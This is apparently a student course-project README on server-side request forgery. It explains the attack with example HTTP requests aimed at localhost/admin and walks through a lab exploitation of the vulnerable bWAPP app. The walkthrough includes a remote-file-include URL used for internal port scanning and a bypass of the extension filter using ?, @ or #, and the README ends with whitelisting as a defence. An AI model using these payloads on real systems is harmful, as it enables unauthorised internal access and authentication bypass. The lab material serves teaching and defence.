## Team Project ##

Univerity of Dayton

Department of Computer Science

CPS 474/574 Software/Language-based Security

Instructor:Dr. Phu Phung

# Server-side request forgery (SSRF) #

## Team 12 - Members: ##

1. Phu Phung <pphung1@udayton.edu>
2. Nhan Tran <tranh6@udayton.edu>

# Project Objectives and Plans #


SSRF is web security vulnerability which allows an attacker to induce server side application and make HTTP requests. Goal of attacker is to leak sensitive data such as authorization credentials. 
A successful SSRF attack results in unauthorized action or access to data within the organization. Data can be accessed either on application itself or on other back-end systems connected to the application. Connections to external third-party systems may result in malicious onward attacks that appear to come from hosting organization.
SSRF attacks often exploit trust relationships and perform unauthorized actions. One of them is SSRF attacks against the server itself. Below is sample of such attack. 
For example, let’s assume we have online application with various products, where application allows user to check is that product available in some store. Function is implemented by passing URL to backend API via next HTTP request

```

   POST /product/stock HTTP/1.0
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 118

   stockApi=http://stock.sampleshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1
```

In this case, attacker can modify request against server itself, like this:

```
   POST /product/stock HTTP/1.0
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 118

   stockApi=http://localhost/admin
```

Content of admin page will be fetched by the server and shown to the attacker. Attacker who simply visit admin URL directly won’t see anything interesting, because he needs authentication. But, if request comes from local machine itself, authentication is bypassed and attacker have full access to admin panel. 
This is just one of many types SSRF attacks. I am planning to give a brief introduce about some of them, and make some a simple application to simulate the attack; After that, me and my teammate will show how application should looks like to avoid such vulnerability. 

# Project Management #

[The Trello Board](https://trello.com/b/z46ToiFy)

Team repository: 

[ss-lbs-f21-team12_SSRF](https://bitbucket.org/ss-lbs-f21-team12/ss-lbs-f21-team12_ssrf/) 


# Project Accomplishments #
Abstract: 
First of all, we need server application which is vulnerable for SSRF. 
Initially, I will use already pre-made server application, which is very vulnerable. I will perform several SSRF attacks against this application, to show how SSRF works. 
In second step, me and Bandar will create our own application (also vulnerable) and perform similar attacks as on pre-made application. 
And, finally, third step, I will update security on my application and show how to defend against SSRF attacks. 

STEP 1.
For pre-made vulnerably server application, I have selected bWapp (Figure 1).
After downloading application, I have installed it locally, and created MySQL database. Application is done using PHP, so we will need MySQL, PHP, and Apache server in order to test this application.

![Login](Pictures/1-Login.PNG)  
Login using “bee” and “bug” for Login and Password. 
Choose SSRF from drop down menu.

![SSRF_Choosing](Pictures/2-SSRF-choosing.PNG)  
Application shows 3 ways to exploit SSRF attack (source BWapp):
1. Port scan hosts on the internal network using RFI.
2. Access resources on the internal network using XXE.
3. Crash Samsung SmartTV (CVE-2013-4890) using XXE 
We will perform the first one (Port Scan). Let's start with the low security level first. 
From the menu in upper right corner, I have selected Remote & Local File Intrusion (RFI/LFI)

![RFI_Choosing](Pictures/3-rfi-choosing(security-low).PNG)  
We should pay attention to this part. This part is typical (common) for selecting some value from drop-down lists and it is often used in web applications. 
After “Go” button is pressed, new URL appears in web browser (Figure 5)

![check language parameter](Pictures/4-CheckLangParameter.PNG)  

This is also important step and we need to pay attention to URL:

http://localhost/bWAPP/rlfi.php?language=lang_en.php&action=go 

We can test and check the URL vulnerability by changing:
language=lang_en.php parameter to “https://www.google.com”.

http://localhost/bWAPP/rlfi.php?ip='victimip'&language= http://localhost/evil/ssrf-1.txt&action=go

I will copy this into web browser. After execution list of all ports is shown, like on Figure 6

![The ports](Pictures/8-PortsShow.PNG)  

Here in bWapp all ports are listed, but in real world application we probably should use port by port scanning in order to find one which is working. 

With this SSRF exploitation, we can do one of following:
Bypass IP whitelisting 
Extract information
Scan internal network etc. 

Some of recommended actions to resolve these issues are:
Disable unused URL schemas 
Sanitize the input and whitelist acceptable file names

Next, we will perform the attack at medium security level. We will increase the security level to 1. 
![Security level](Pictures/9-MediumSecurity.PNG)  
The attack does not work since the code now has been forced the extension .php to be appended to the language parameter. 
![Recheck](Pictures/10-Recheckfile.PNG)  
This can also be bypass by adding characters like ?, @ or # at the end of the URL to force PHP to reinterpret the URL and discard the extension.
![Bypass](Pictures/11-Bypass.PNG)  

# Protection #
One of the best practice to protect against the SSRF attack using RLFI is whitelisting permitted files which is also the highest security level in the BWapp website. 
![Bypass](Pictures/12-Whitelising.PNG)  
The goals of our project is to increase the security of the web app in order to mitigate the risk of getting SSRF attack from hackers; and we have successfully learnt the solution to improve the application. Still, it is not 100% guarantee preventing the SSRF attack since there are many new ways that the attacker can exploit the program. However, I believe we have also sucessfully raised awareness about the SSRF attack by demonstrate how easy it could be done.  


